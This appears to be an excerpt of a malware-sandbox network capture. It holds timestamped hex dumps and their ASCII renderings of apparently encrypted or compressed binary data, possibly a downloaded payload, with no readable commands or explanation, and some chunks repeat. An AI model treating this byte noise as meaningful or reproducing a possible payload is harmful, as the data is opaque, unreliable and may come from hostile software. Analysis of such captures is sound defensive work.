                                          2021-12-23 16:00:51 UTC46INData Raw: 89 2a c3 0b 82 95 b4 ee 42 c3 61 82 4e f4 1c 49 24 92 09 28 ed f9 ec 31 b5 22 2c fc dd 84 4a 4b bc ab 43 d8 63 e1 34 6e 42 c3 60 4f 6d 08 1c 95 24 12 d6 28 0d 59 b8 64 e9 22 e0 9c 3d b7 c9 4a 89 0b 43 0c 83 e1 34 4e 2e c3 e1 4f 4e 28 1c a9 a5 72 ea 48 0d 59 ec 65 c9 41 60 1c 5d b8 96 4b 9d ab 43 8c 63 15 94 3a 61 90 60 4f ee a8 d0 a9 a5 12 d6 c8 ed 45 ec 65 e9 41 2c 1b 29 84 4a 4a bc 0b 23 ec 83 15 80 4e 2e 90 e1 03 4e 08 4f 49 25 12 ea 28 d9 78 ec 31 c9 c2 2c 9c 5d b7 96 17 89 2b 0f d8 83 14 b4 6d e2 a4 60 83 6e f4 50 95 a5 5e 09 14 d9 79 b8 64 b5 41 40 fc 3d b8 ca 2b bd 2b 43 ec 83 14 34 6d 42 c3 41 03 3a 27 50 c8 25 12 8a c8 ed 78 cc 64 b5 0e 60 9c 5c 38 4a 2b 89 ab 42 0b 63 95 b3 ee 62 c4 e1 82 ee 28 50 a9 24 5e 0a 14 8d 45 6c 65 e9 0e 40 e8 29 84 aa
                                          Data Ascii: *BaNI$(1",JKCc4nB`Om$(Yd"=JC4N.ON(rHYeA`]KCc:a`OEeA,)JJ#N.NOI%(x1,]+m`nP^ydA@=++C4mBA:'P%xd`\8J+Bcb(P$^Ele@)
                                          2021-12-23 16:00:51 UTC48INData Raw: 42 2c 1b 3d 84 c9 17 bd f7 0f d8 82 e1 b3 6d 62 c4 61 82 ee 08 4f c8 a5 12 0a c8 d9 79 cc 64 e9 22 2c 9c 5d 38 c9 4b 9d ab 23 d8 82 14 34 3a 42 44 60 82 4e 08 d0 a9 a5 92 0a 28 0d 45 b8 64 69 41 40 9c dd 38 ca 17 bd f7 42 d8 03 f5 34 3a 2e a4 61 4f 3a 28 d0 c8 24 5e 0a 47 0c 45 b8 64 b5 22 40 fc dd b7 96 17 89 2a 0f 0b 63 95 80 ee 42 a4 60 83 6e f4 4f 49 a5 92 ea 14 0d 79 6c e5 b5 0e e0 fc 3d b8 c9 2b bc 2b 43 d8 63 f5 34 6d e2 90 60 4f ee 28 d0 c8 f1 91 09 28 0d 59 eb 65 b5 c2 60 1b dd 84 c9 17 89 0b 0f ec 03 15 94 ee e2 c4 61 83 3a 08 1c 49 f1 91 d6 14 d9 59 ec e5 c9 42 e0 1b 3d 38 c9 4a bd f7 42 8c 03 95 34 ee 42 c3 e1 03 6e 28 d0 c8 24 12 ea 28 d9 f9 6c 31 e9 42 60 fc dd 98 c9 cb 3d 0b 0f ec 82 95 34 ee 42 44 41 4f 4e a8 50 a9 25 5e 0a 47 0d 59 eb e5
                                          Data Ascii: B,=mbaOyd",]8K#4:BD`N(EdiA@8B4:.aO:($^GEd"@*cB`nOIyl=++Cc4m`O((Ye`a:IYB=8JB4Bn($(l1B`=4BDAONP%^GY
                                          2021-12-23 16:00:51 UTC49INData Raw: 0a 48 d9 45 eb 64 b5 c2 5f 1b 5d b7 96 4a bd 0b c3 d8 03 f5 94 6e 42 44 60 4f 4e f4 4f 95 05 92 8a 47 8d 78 b8 64 c9 41 60 e8 3d 38 4a cb 9d 2b 0f 0c 63 14 94 6e e2 c3 e1 03 6e f4 1c 49 f1 12 8a 14 8d 59 ec 64 69 c2 60 e8 5d b8 c9 2b bd 2a 43 8c 4f 15 34 3a 2e c4 41 83 3a 27 50 c8 a5 91 d6 47 ed 45 b8 e5 e9 41 60 fc 5c 38 4a 17 9d 2a 43 0c 4f e1 80 6d e2 c4 2d 82 ee 08 30 95 24 12 09 c8 0d 79 cc 31 69 0e 40 1c 5d 38 c9 2b bc ab 23 ec 63 15 80 ee 42 44 61 83 6e 28 50 c8 a5 72 0a 14 ed 59 b8 e5 c9 22 e0 e8 5c 98 aa 4b 9d 2a 23 ec 82 15 b4 3a e2 44 41 63 ee f4 d0 49 f1 72 0a c8 d9 f9 ec 31 e9 42 2c fc dd 38 ca 4a 3d ab c3 0c 82 95 b4 ee 61 c3 60 83 3a 27 30 a9 24 91 09 48 8d 45 6c 45 e8 0e 40 9c 5d b8 c9 4b 9d f7 c3 ec 83 14 34 4e 61 90 61 4f ee 08 d0 49 25
                                          Data Ascii: HEd_]JnBD`ONOGxdA`=8J+cnnIYdi`]+*CO4:.A:'PGEA`\8J*COm-0$y1i@]8+#cBDan(PrY"\K*#:DAcIr1B,8J=a`:'0$HElE@]K4NaaOI%
                                          2021-12-23 16:00:51 UTC50INData Raw: 61 82 ee 28 4f c9 05 72 09 14 ed 45 cc e5 e8 42 e0 e8 dd b7 c9 2b 9d ab 23 ec 83 95 34 6e 2e c3 41 03 6d a8 d0 c8 a5 92 d6 28 ed 78 ec 65 b5 42 40 e8 5c b7 ca 17 bc 0b 43 8c 83 14 34 6d 62 c3 61 82 4e 27 1c c9 24 91 ea 14 0d f9 ec 65 e9 42 2c 1c 29 84 c9 cb bd f7 0f d8 4f 95 b3 3a 62 c3 61 82 6e a8 d0 c8 f1 91 0a 28 d9 78 ec 31 69 41 2c 9c 29 98 4a 4b 3d f7 0f 0b 83 14 b4 6d 2e c4 41 82 4e f4 50 95 f1 91 ea c8 8d 78 6c 45 e8 22 e0 fc 5d 38 aa 4b 9d 2b 43 8c 03 14 80 6d e2 c3 e1 03 4e 08 30 49 a5 72 ea 48 0d f9 b8 31 c9 0e 5f 1b 29 b8 4a 4b 3d f7 c3 0b 82 f5 b3 6e 42 c3 60 4f ee 08 1c c8 24 72 09 47 d9 45 ec 31 69 22 60 1b 29 84 ca 4b bd 2b 42 0b 63 f5 94 ee 2e a4 61 63 6d f4 4f c8 24 72 8a 48 8d 78 6c 45 b5 c2 60 1c 29 38 ca 2b 9d 0b c3 ec 82 14 b4 4e 2e
                                          Data Ascii: a(OrEB+#4n.Am(xeB@\C4mbaN'$eB,)O:ban(x1iA,)JK=m.ANPxlE"]8K+CmN0IrH1_)JK=nB`O$rGE1i"`)K+Bc.acmO$rHxlE`)8+N.
                                          2021-12-23 16:00:51 UTC52INData Raw: 0b 82 14 34 6e 61 a4 2d 63 ee 27 30 c9 24 72 8a 48 0d f9 ec e5 e9 c2 5f 1c dd 38 c9 2b 3d 2a c3 0c 63 14 b4 4e 61 44 60 83 6d 08 30 95 f1 91 ea 48 ed f9 eb e5 b5 41 40 fc 29 b7 96 4a 9d 2b c3 ec 82 f5 94 6e 62 a4 60 4f 6d f4 d0 a9 24 12 d6 c8 8d 59 ec 65 e8 c2 e0 e8 3d b7 aa 4b bc f7 0f 0c 82 95 80 6e 62 44 41 03 ee f4 4f 49 05 72 09 c8 d9 45 b8 31 e8 42 60 9c 29 38 ca cb 9d 0b 23 0b 63 15 34 6d 42 c3 e1 4f 4e a8 1c a9 a5 5e 8a 14 0d 59 cc 65 b5 c2 2c 1c dd b8 ca cb bd 2b 0f ec 03 f5 94 3a 61 c4 41 82 6e a8 1c 95 f1 72 d6 14 ed 45 b8 65 b5 22 60 1c 29 84 96 4a bd f7 0f 0b 03 e1 b3 4e 2e 44 e1 4f 6d f4 50 95 24 72 0a c8 ed f9 6c e5 e9 c2 5f 1c dd b7 c9 cb 9d 0b 42 8c 82 15 34 ee 42 c3 60 83 4e 28 1c a9 05 92 ea 47 0c 79 b8 64 c9 42 60 e8 dd b7 ca cb bd ab
                                          Data Ascii: 4na-c'0$rH_8+=*cNaD`m0HA@)J+nb`Om$Ye=KnbDAOIrE1B`)8#c4mBON^Ye,+:aAnrEe"`)JN.DOmP$rl_B4B`N(GydB`
                                          2021-12-23 16:00:51 UTC53INData Raw: 5c b7 aa 2b 3d 2a 42 d8 82 e1 94 6e 2e 44 60 83 6e a8 50 c8 a5 91 ea 28 d9 59 cc 31 69 42 5f fc 5c 38 4a 17 bd 2a c3 ec 4f 15 b4 6e 62 c3 41 4f 6e a8 30 a9 a5 5e ea 47 0d 45 eb 64 b5 22 2c e8 29 38 4a 4a bd 0b 42 0b 83 e1 b3 6d 42 90 e1 82 4e f4 1c 95 25 12 0a 48 0c 78 cc 45 c9 42 5f 1b 5c b8 4a 4a bc 2b 0f 8c 63 f5 b3 4e e2 c3 41 83 3a 27 50 a9 f1 12 ea 47 ed 79 eb e5 e8 42 e0 1b 5d 98 ca 4b 3d 0b 42 ec 82 95 34 ee 62 90 60 83 ee f4 1c 49 f1 12 09 c8 ed 78 6c 64 c9 22 e0 e8 dd 84 aa 17 bd 2a c3 0b 63 95 94 6e 42 a4 e1 4f ee f4 30 c8 25 72 8a c8 0d f9 b8 45 e8 0e 2c fc 5d b7 ca 2b 89 ab 23 0b 03 95 80 6d 61 a4 e1 83 3a f4 50 49 24 72 8a 28 0d f9 ec 64 69 c2 e0 9c 5c 98 aa 4a 9d ab 42 d8 03 f5 34 6e 61 44 61 4f 4e 27 d0 a9 a5 91 d6 28 d9 78 b8 e5 b5 0e 60
                                          Data Ascii: \+=*Bn.D`nP(Y1iB_\8J*OnbAOn0^GEd",)8JJBmBN%HxEB_\JJ+cNA:'PGyB]K=B4b`Ixld"*cnBO0%rE,]+#ma:PI$r(di\JB4naDaON'(x`
                                          2021-12-23 16:00:51 UTC54INData Raw: 45 eb 45 69 22 60 1b dd 98 ca 4a 3d 2a 43 0c 83 15 34 6e 62 c3 61 4f ee f4 30 49 25 12 ea 14 0d 45 6c 31 e9 41 40 fc 5c b7 96 cb bd 0b 0f 0b 83 15 80 6e e2 c4 60 82 6d 27 50 c9 25 92 ea 14 0c 78 cc 65 c9 22 60 e8 3d 38 4a cb 3d f7 0f 0c 03 e1 80 6e 62 a4 e1 03 4e 28 1c a9 05 91 d6 28 0c 45 ec 45 c9 42 5f 9c 3d 84 aa 4b 3d 2b 23 0c 63 15 b3 4e 42 44 61 83 6d f4 d0 a9 a5 92 0a 48 d9 45 6c 65 c9 22 5f fc 5c 38 4a 4a 9d ab 43 0b 83 f5 34 6d 62 c4 2d 82 4e 27 30 c8 a5 72 09 14 ed 59 b8 31 b5 22 5f fc 29 b8 aa 2b bd 2a 43 ec 63 14 b3 ee 2e a4 e1 4f 3a a8 50 c8 24 92 0a c8 ed 78 b8 64 c9 42 2c e8 dd b7 96 17 bc 0b 0f 0c 82 14 b4 ee 62 c4 e1 82 6d a8 30 a9 f1 92 09 48 ed 79 eb 31 69 c2 e0 1c 29 38 ca 2b bc f7 c3 d8 63 95 b3 6d e2 c3 2d 82 3a f4 d0 c8 a5 91 09 48
                                          Data Ascii: EEi"`J=*C4nbaO0I%El1A@\n`m'P%xe"`=8J=nbN((EEB_=K=+#cNBDamHEle"_\8JJC4mb-N'0rY1"_)+*Cc.O:P$xdB,bm0Hy1i)8+cm-:H
                                          2021-12-23 16:00:51 UTC59INData Raw: 60 e8 dd b8 c9 2b 89 2a 0f 0c 63 f5 b4 4e 2e c4 2d 82 3a a8 4f c8 24 12 0a 14 0c 59 eb 64 e9 41 40 1b dd 98 aa 17 bd 2b 43 0c 82 e1 94 6d 61 90 60 03 3a 28 50 c8 24 12 0a 28 0c 59 ec 64 b5 0e 5f e8 3d 98 aa cb 9d 2b 43 0c 63 e1 80 ee 2e c3 61 4f 6d a8 1c a9 f1 5e 09 28 d9 78 b8 45 b5 c2 e0 9c 29 b8 ca 17 9d ab 23 0b 82 14 b3 6e 2e 44 41 4f ee f4 30 a9 f1 91 8a 47 0d 78 6c 64 e8 0e 40 9c 29 b8 c9 17 bc 2a 43 ec 63 e1 b4 4e 61 c3 60 03 4e 27 d0 a9 05 91 09 48 0d 78 6c 45 e9 42 60 9c dd b7 aa 2b 89 2a 0f ec 03 e1 b3 3a 2e c4 61 4f ee 08 30 c9 00 25 5e 8a 28 0d 45 b8 45 e8 42 5f e8 dd b7 ca 2b bd f7 c3 8c 83 e1 b3 ee 42 90 60 63 6e 08 1c 49 25 12 ea c8 ed 78 eb 31 c9 42 40 1c 29 84 aa 4b 3d 0b 42 0b 63 14 b3 ee 2e c3 61 63 ee 28 50 95 a5 5e 8a 48 d9 78 6c 65
                                          Data Ascii: `+*cN.-:O$YdA@+Cma`:(P$(Yd_=+Cc.aOm^(xE)#n.DAO0Gxld@)*CcNa`N'HxlEB`+*:.aO0%^(EEB_+B`cnI%x1B@)K=Bc.ac(P^Hxle
                                          2021-12-23 16:00:51 UTC63INData Raw: 96 2b 3d 0b 23 8c 83 14 b3 6e 42 c4 41 83 6d 08 50 95 f1 92 09 48 0c 45 cc 65 69 22 40 9c 5d 98 c9 4b bc 2b 23 ec 4f f5 94 ee 62 a4 2d 83 6d f4 30 95 25 72 09 28 0d 59 cc 45 e9 42 5f fc 29 b8 ca cb 9d 2b 43 ec 82 15 34 ee e2 a4 2d 83 6d f4 1c c8 05 72 09 c8 d9 59 6c 65 b5 c2 2c 9c 5c b7 4a 4a 3d 2b 0f 0b 82 15 34 6d 61 90 60 03 6e a8 30 95 f1 5e 09 c8 8d 59 ec 64 e8 22 e0 1b 29 b8 c9 cb 9d f7 43 0c 4f 14 80 ee e2 44 60 03 ee 08 30 c8 24 5e 8a 28 0c 59 cc 45 e9 c2 2c e8 5d b7 96 4b bd ab 42 0c 03 15 34 6d 42 c4 61 4f 6d 27 30 a9 a5 91 09 14 0c 45 cc 65 b5 c2 5f 1c 5d 38 ca 4a 3d 2a 23 ec 4f f5 94 3a e2 c4 60 63 6d a8 d0 95 25 91 8a 28 d9 79 ec 65 e9 41 40 e8 5d 38 aa 2b 3d f7 23 0b 83 e1 b3 6d 2e a4 2d 4f 3a a8 d0 c8 25 72 09 47 0d 45 eb 64 c9 0e e0 1b 3d
                                          Data Ascii: +=#nBAmPHEei"@]K+#Ob-m0%r(YEB_)+C4-mrYle,\JJ=+4ma`n0^Yd")COD`0$^(YE,]KB4mBaOm'0Ee_]8J=*#O:`cm%(yeA@]8+=#m.-O:%rGEd=
                                          2021-12-23 16:00:51 UTC64INData Raw: 63 6d a8 d0 49 f1 92 d6 14 0c 79 eb 45 69 0e 40 1b 3d 98 ca 17 3d ab 0f d8 82 14 b3 6e 42 c4 e1 03 6e 27 50 95 a5 12 8a 47 d9 45 b8 e5 b5 41 5f 1c 5c 98 96 4a 89 0b 23 0c 83 95 80 4e 2e 90 41 03 ee 08 50 c9 f1 12 8a 14 8d 45 cc 65 e8 41 40 e8 29 98 96 2b bd 2b 0f d8 83 e1 80 3a e2 c3 61 03 3a 27 d0 49 f1 92 0a 48 d9 45 b8 45 e8 c2 40 1c dd 98 96 4b 3d f7 43 0b 03 95 94 4e 42 90 61 82 6e a8 30 c8 05 12 09 28 0d 79 eb 65 69 0e 60 9c 3d b8 ca 2b 3d 0b 23 0b 83 f5 34 ee 62 c4 60 4f 6e a8 50 c8 f1 92 09 48 d9 79 6c 45 c9 c2 e0 9c 29 b8 4a 17 bc 2b 42 0b 82 15 b4 ee e2 44 2d 82 6e a8 d0 95 25 12 d6 14 ed f9 6c 64 e9 22 e0 1b 3d 38 c9 4a bc 2b 43 d8 82 f5 b4 6e 42 90 2d 82 3a 08 50 c8 24 91 ea c8 0d 45 eb 65 c9 c2 60 1b 3d b8 4a 4a bc 2b 43 8c 4f e1 34 4e 2e 90
                                          Data Ascii: cmIyEi@==nBn'PGEA_\J#N.APEeA@)++:a:'IHEE@K=CNBan0(yei`=+=#4b`OnPHylE)J+BD-n%ld"=8J+CnB-:P$Ee`=JJ+CO4N.
                                          2021-12-23 16:00:51 UTC68INData Raw: c8 05 91 8a 14 d9 45 ec 64 b5 41 e0 9c 3d 98 4a cb 9d 2b 23 ec 82 f5 b3 4e 2e c4 60 83 ee 28 50 95 24 5e 09 28 8d 45 b8 45 b5 0e 60 9c 29 b7 96 4a bc 2a c3 0c 03 f5 b4 6e 62 90 2d 03 4e f4 50 a9 24 92 8a 47 0d 78 cc 45 c9 0e 5f 9c 5d 84 96 4a 9d 2a 42 d8 82 e1 b3 3a 62 a4 2d 4f 3a a8 1c a9 05 91 ea 28 0c f9 eb 65 e8 41 60 9c 5d b7 4a 2b 3d 2b c3 0c 63 95 94 ee 62 a4 41 4f 6d 08 d0 a9 05 5e ea 48 ed 78 eb 31 69 c2 2c 9c 3d b8 4a 2b bd f7 c3 0c 82 95 34 6d 62 c4 60 82 ee f4 d0 a9 f1 12 0a c8 0d 79 cc 65 c9 42 2c fc 29 b8 4a cb bc 0b 23 0c 03 95 34 ee 2e c3 e1 63 3a 27 30 c8 25 72 ea c8 8d 79 b8 31 e9 42 5f 1b dd 98 4a 4b 9d ab c3 0b 82 f5 34 3a 42 c4 61 83 3a 28 1c 49 25 92 ea 48 d9 78 ec 65 b5 0e e0 fc 3d 98 aa cb 89 2b c3 0c 83 14 b3 3a 42 c3 e1 82 6d 27
                                          Data Ascii: EdA=J+#N.`(P$^(EE`)J*nb-NP$GxE_]J*B:b-O:(eA`]J+=+cbAOm^Hx1i,=J+4mb`yeB,)J#4.c:'0%ry1B_JK4:Ba:(I%Hxe=+:Bm'
                                          2021-12-23 16:00:51 UTC72INData Raw: 0d 79 eb 65 69 41 60 9c 29 98 4a 2b 89 f7 23 d8 83 e1 b3 6e 2e 90 41 82 4e 08 d0 a9 f1 12 0a 48 0c 78 b8 65 c9 41 2c e8 5c 84 4a 4a 9d 2b c3 ec 82 14 b4 6e 42 90 61 83 3a a8 30 95 24 12 0a 48 ed f9 6c e5 b5 42 5f 1c 5d 98 c9 4b 89 2b 23 8c 82 15 b4 6e 2e c4 41 82 6e f4 d0 a9 25 12 d6 47 0c 45 6c 64 e9 42 2c 1b 5d b8 aa 2b 3d f7 23 d8 63 14 b3 6e 62 90 60 4f 3a 28 1c c8 a5 5e ea 48 0d 59 b8 64 c9 0e 5f fc 5c 38 4a cb bc 2b c3 8c 63 e1 80 3a 2e c3 41 03 6d 08 30 95 05 92 d6 28 0c f9 cc 64 c9 41 e0 fc 5c 98 4a 4b 3d 2a 42 8c 83 14 b4 ee 62 c3 61 82 6e 27 d0 c8 05 72 8a c8 d9 59 ec 65 e8 c2 40 1b 5d 84 ca cb 3d ab 0f 0c 82 14 34 4e 42 c3 2d 4f 3a a8 4f 95 24 72 d6 c8 ed 79 eb 64 e9 0e 2c 1b 5c 84 aa cb bc 2b 0f d8 83 95 80 6d 42 c4 2d 03 ee f4 30 c8 a5 72 d6
                                          Data Ascii: yeiA`)J+#n.ANHxeA,\JJ+nBa:0$HlB_]K+#n.An%GEldB,]+=#cnb`O:(^HYd_\8J+c:.Am0(dA\JK=*Bban'rYe@]=4NB-O:O$ryd,\+mB-0r
                                          2021-12-23 16:00:51 UTC76INData Raw: e9 c2 e0 e8 5d 38 aa cb 89 2b c3 0c 82 15 b3 6e e2 c3 60 4f ee 27 1c 95 25 92 0a c8 0c 45 ec 31 e9 22 e0 9c 3d b7 ca 17 9d ab 43 d8 03 e1 94 6d 61 44 e1 03 4e 27 d0 a9 24 72 8a 47 d9 79 ec 65 b5 42 5f fc 5d 84 ca 4b bd ab c3 ec 4f f5 34 4e 2e 90 2d 63 ee a8 30 95 24 5e 09 14 ed 78 cc e5 b5 c2 e0 1c 5c 38 aa 17 9d 2b 42 0b 63 15 94 ee 61 c3 61 83 4e f4 30 c8 25 12 d6 48 8d 79 cc 31 c9 41 40 e8 dd b8 aa 17 bc f7 23 ec 83 f5 34 4e 42 c3 41 63 6d a8 30 c8 24 91 d6 47 8d 45 b8 31 b5 41 60 fc dd 98 ca 4a 89 2a 0f 0b 4f 14 94 3a 61 c3 60 03 3a 08 30 a9 a5 12 0a 47 d9 f9 b8 64 69 0e 40 e8 3d b8 aa 4b bc f7 c3 d8 63 15 80 ee e2 90 e1 63 ee f4 4f c8 f1 12 ea c8 8d 79 6c 31 69 c2 40 fc dd b8 96 4b bc 0b 43 0c 03 95 b4 6e 62 44 41 83 6e 27 4f 95 24 72 09 48 d9 45 b8
                                          Data Ascii: ]8+n`O'%E1"=CmaDN'$rGyeB_]KO4N.-c0$^x\8+BcaaN0%Hy1A@#4NBAcm0$GE1A`J*O:a`:0Gdi@=KccOyl1i@KCnbDAn'O$rHE
                                          2021-12-23 16:00:51 UTC80INData Raw: b8 aa cb bc f7 23 ec 03 15 34 6e 62 a4 e1 63 4e 08 30 c8 05 91 09 47 0d 59 b8 e5 69 41 60 e8 dd b8 c9 4b bd f7 43 0b 03 f5 80 3a e2 a4 41 82 6e 28 30 49 a5 12 0a 47 0d f9 6c e5 e9 22 5f 1b 3d 98 c9 4b 3d 2a 42 8c 63 95 b4 6d 2e 44 61 03 6d 27 30 a9 f1 72 ea 47 0d 59 cc 45 e9 42 5f 1c 5c 38 4a cb bd 2a 0f 0c 82 15 b3 3a e2 a4 41 03 ee 27 50 95 24 91 09 28 d9 45 cc 65 e8 22 e0 9c dd 38 ca 17 bc 0b 0f d8 03 f5 b3 6d 42 90 e1 03 ee f4 d0 c9 f1 91 d6 47 0c 79 cc 31 69 c2 40 1b 29 84 ca 17 bc ab 23 8c 82 14 94 6d e2 44 61 4f 4e a8 4f c8 05 72 8a 28 ed f9 cc e5 b5 c2 5f e8 3d 98 96 2b 3d ab 42 ec 4f e1 94 3a e2 44 61 63 3a 28 50 49 05 92 8a 48 0c 79 eb 31 c9 42 5f 9c 5c 98 96 4a 89 0b 42 0c 4f 95 b4 4e 61 c4 60 82 4e f4 d0 c9 05 12 d6 47 ed f9 eb 31 b5 22 5f e8
                                          Data Ascii: #4nbcN0GYiA`KC:An(0IGl"_=K=*Bcm.Dam'0rGYEB_\8J*:A'P$(Ee"8mBGy1i@)#mDaONOr(_=+=BO:Dac:(PIHy1B_\JBONa`NG1"_
                                          2021-12-23 16:00:51 UTC84INData Raw: 2b 43 0c 83 14 80 6e 2e 44 61 4f 4e 08 d0 49 24 91 0a 28 ed 79 6c 64 e9 0e e0 fc 5c 98 aa 4b 9d f7 0f 0b 82 95 80 6d 2e 90 61 4f ee f4 1c a9 25 12 ea c8 d9 78 ec 31 c9 22 40 9c 3d b8 aa 4b 3d f7 c3 0b 03 15 b3 ee 61 44 60 82 6d 08 1c 49 05 12 0a c8 8d f9 b8 64 69 c2 60 1b 5c b8 aa cb bd 2b 0f 8c 82 e1 b4 3a 2e a4 61 83 ee a8 d0 49 24 72 d6 47 d9 f9 cc e5 e9 c2 2c e8 5d 84 c9 4a bc 0b 23 0b 83 95 34 ee 2e c4 61 83 6e 27 50 c8 05 12 ea c8 0d 45 b8 45 b5 22 60 e8 5c 84 aa cb 9d 2a c3 0b 4f 95 34 6e 61 c4 60 4f 6d 27 d0 c9 f1 72 ea 28 8d f9 6c 64 e9 0e e0 e8 dd b8 ca 2b bc 0b 0f 0c 4f 14 80 6e 61 44 61 03 3a 28 4f c9 25 12 d6 48 0c 79 eb 31 e8 41 e0 9c 29 b8 aa 17 bd ab 43 8c 82 e1 b4 ee 62 44 e1 4f 6e 27 30 c8 25 91 09 14 d9 f9 cc e5 69 41 40 fc dd 84 aa 4a
                                          Data Ascii: +Cn.DaONI$(yld\Km.aO%x1"@=K=aD`mIdi`\+:.aI$rG,]J#4.an'PEE"`\*O4na`Om'r(ld+OnaDa:(O%Hy1A)CbDOn'0%iA@J
                                          2021-12-23 16:00:51 UTC89INData Raw: b3 6d 42 90 2d 4f 6d a8 50 c9 24 12 d6 14 0c 59 b8 31 c9 42 40 9c 3d 84 c9 cb 3d 0b 23 0b 4f 14 94 6d e2 90 2d 82 ee a8 4f a9 f1 12 0a 14 8d 59 ec e5 e9 c2 e0 1c 5c 38 ca cb bd 2b c3 0c 4f 15 80 ee 42 c4 e1 82 ee f4 30 c8 a5 72 ea 48 ed f9 6c 65 69 22 60 e8 3d 84 aa 4a bc ab 0f 0c 82 95 94 ee e2 44 61 03 ee f4 50 c9 a5 92 d6 48 0d 79 cc 64 e8 0e 60 1c 29 b7 96 2b bc 2b c3 8c 63 15 34 3a 62 c4 2d 82 4e f4 d0 a9 24 12 09 48 8d 78 ec 45 b5 41 5f e8 dd b7 aa cb bc 0b c3 8c 4f e1 80 4e 62 c4 2d 82 6e 08 50 c8 f1 12 ea 47 d9 79 ec e5 69 c2 40 e8 dd b7 4a 4b bd f7 42 d8 63 15 34 ee 61 c4 e1 63 6d 08 d0 95 24 91 ea 28 0d 78 cc 45 e9 41 2c fc 5c 98 ca 2b 89 2b c3 8c 83 e1 80 6e 2e 44 41 03 6d 08 30 49 a5 5e d6 c8 0d 59 b8 31 e9 41 e0 1b 5c 98 96 cb bc 2a c3 0b 83
                                          Data Ascii: mB-OmP$Y1B@==#Om-OY\8+OB0rHlei"`=JDaPHyd`)++c4:b-N$HxEA_ONb-nPGyi@JKBc4acm$(xEA,\++n.DAm0I^Y1A\*
                                          2021-12-23 16:00:51 UTC93INData Raw: 41 63 4e f4 50 c9 a5 92 09 48 d9 78 6c 65 e9 0e 40 1b 5c b8 96 2b 89 0b 43 d8 82 15 34 ee 61 a4 41 82 4e f4 50 a9 a5 12 d6 47 0c f9 eb 65 e9 0e e0 9c dd b8 4a 4b 89 0b 43 ec 63 14 80 4e 42 c4 61 63 6e 28 50 c8 25 91 8a c8 0d 78 cc 45 b5 22 5f fc 5d 84 c9 4a 3d ab c3 8c 4f e1 b3 3a 62 a4 60 83 3a f4 1c a9 05 12 ea c8 0d 78 cc 45 e8 22 e0 1b 3d 98 4a 4a 3d ab 0f 8c 82 f5 34 6d 42 44 41 03 ee f4 30 49 a5 72 8a 28 ed 78 eb 64 b5 42 e0 e8 5d 98 aa 17 bc 2b c3 8c 83 95 80 ee 2e c3 41 82 3a 27 1c 95 a5 12 09 c8 d9 79 cc 65 69 22 60 1c 29 84 ca 17 89 2a 43 0c 4f 15 80 ee 2e c4 41 03 6e 08 d0 95 a5 92 09 47 0c 59 6c 45 c9 42 40 9c 3d b7 4a 4a bd 2b 0f 8c 4f e1 34 4e 62 c4 60 82 6d a8 1c a9 f1 5e 09 14 8d 78 cc 31 e9 22 e0 1c 5d 84 96 2b 9d 2b 42 0b 63 15 80 6e 2e
                                          Data Ascii: AcNPHxle@\+C4aANPGeJKCcNBacn(P%xE"_]J=O:b`:xE"=JJ=4mBDA0Ir(xdB]+.A:'yei"`)*CO.AnGYlEB@=JJ+O4Nb`m^x1"]++Bcn.
                                          2021-12-23 16:00:51 UTC96INData Raw: 4e 2e 90 2d 63 ee a8 30 95 24 5e 09 14 ed 78 cc e5 b5 c2 e0 1c 5c 38 aa 17 9d 2b 42 0b 63 15 94 ee 61 c3 61 83 4e f4 30 c8 25 12 d6 48 8d 79 cc 31 c9 41 40 e8 dd b8 aa 17 bc f7 23 ec 83 f5 34 4e 42 c3 41 63 6d a8 30 c8 24 91 d6 47 8d 45 b8 31 b5 41 60 fc dd 98 ca 4a 89 2a 0f 0b 4f 14 94 3a 61 c3 60 03 3a 08 30 a9 a5 12 0a 47 d9 f9 b8 64 69 0e 40 e8 3d b8 aa 4b bc f7 c3 d8 63 15 80 ee e2 90 e1 63 ee f4 4f c8 f1 12 ea c8 8d 79 6c 31 69 c2 40 fc dd b8 96 4b bc 0b 43 0c 03 95 b4 6e 62 44 41 83 6e 27 4f 95 24 72 09 48 d9 45 b8 64 e8 42 60 1b 29 98 c9 17 bd 2a 23 0c 03 95 94 6d e2 a4 2d 82 6d 27 50 c9 f1 12 d6 c8 ed 45 b8 31 e8 42 60 1c 3d 84 aa cb bc ab 23 0b 4f f5 b3 6e 2e a4 41 4f ee 28 4f c8 a5 12 ea 14 8d 78 eb e5 e8 0e e0 9c 3d 38 4a 4a bc 2a 43 ec 63 14
                                          Data Ascii: N.-c0$^x\8+BcaaN0%Hy1A@#4NBAcm0$GE1A`J*O:a`:0Gdi@=KccOyl1i@KCnbDAn'O$rHEdB`)*#m-m'PE1B`=#On.AO(Ox=8JJ*Cc
                                          2021-12-23 16:00:51 UTC100INData Raw: 03 6d 27 30 a9 f1 72 ea 47 0d 59 cc 45 e9 42 5f 1c 5c 38 4a cb bd 2a 0f 0c 82 15 b3 3a e2 a4 41 03 ee 27 50 95 24 91 09 28 d9 45 cc 65 e8 22 e0 9c dd 38 ca 17 bc 0b 0f d8 03 f5 b3 6d 42 90 e1 03 ee f4 d0 c9 f1 91 d6 47 0c 79 cc 31 69 c2 40 1b 29 84 ca 17 bc ab 23 8c 82 14 94 6d e2 44 61 4f 4e a8 4f c8 05 72 8a 28 ed f9 cc e5 b5 c2 5f e8 3d 98 96 2b 3d ab 42 ec 4f e1 94 3a e2 44 61 63 3a 28 50 49 05 92 8a 48 0c 79 eb 31 c9 42 5f 9c 5c 98 96 4a 89 0b 42 0c 4f 95 b4 4e 61 c4 60 82 4e f4 d0 c9 05 12 d6 47 ed f9 eb 31 b5 22 5f e8 dd 84 4a 17 bd f7 42 ec 4f 15 b4 6e e2 c4 61 82 3a f4 d0 a9 a5 5e ea 48 ed 78 eb e5 c9 22 2c 9c 5c b7 aa 17 bd f7 c3 0b 83 f5 b4 ee 42 c4 61 82 3a 27 50 a9 05 12 8a c8 0c 79 cc e5 e9 0e 40 1b dd b7 aa 4a 9d 0b 42 0c 03 e1 b3 4e 2e c3
                                          Data Ascii: m'0rGYEB_\8J*:A'P$(Ee"8mBGy1i@)#mDaONOr(_=+=BO:Dac:(PIHy1B_\JBONa`NG1"_JBOna:^Hx",\Ba:'Py@JBN.
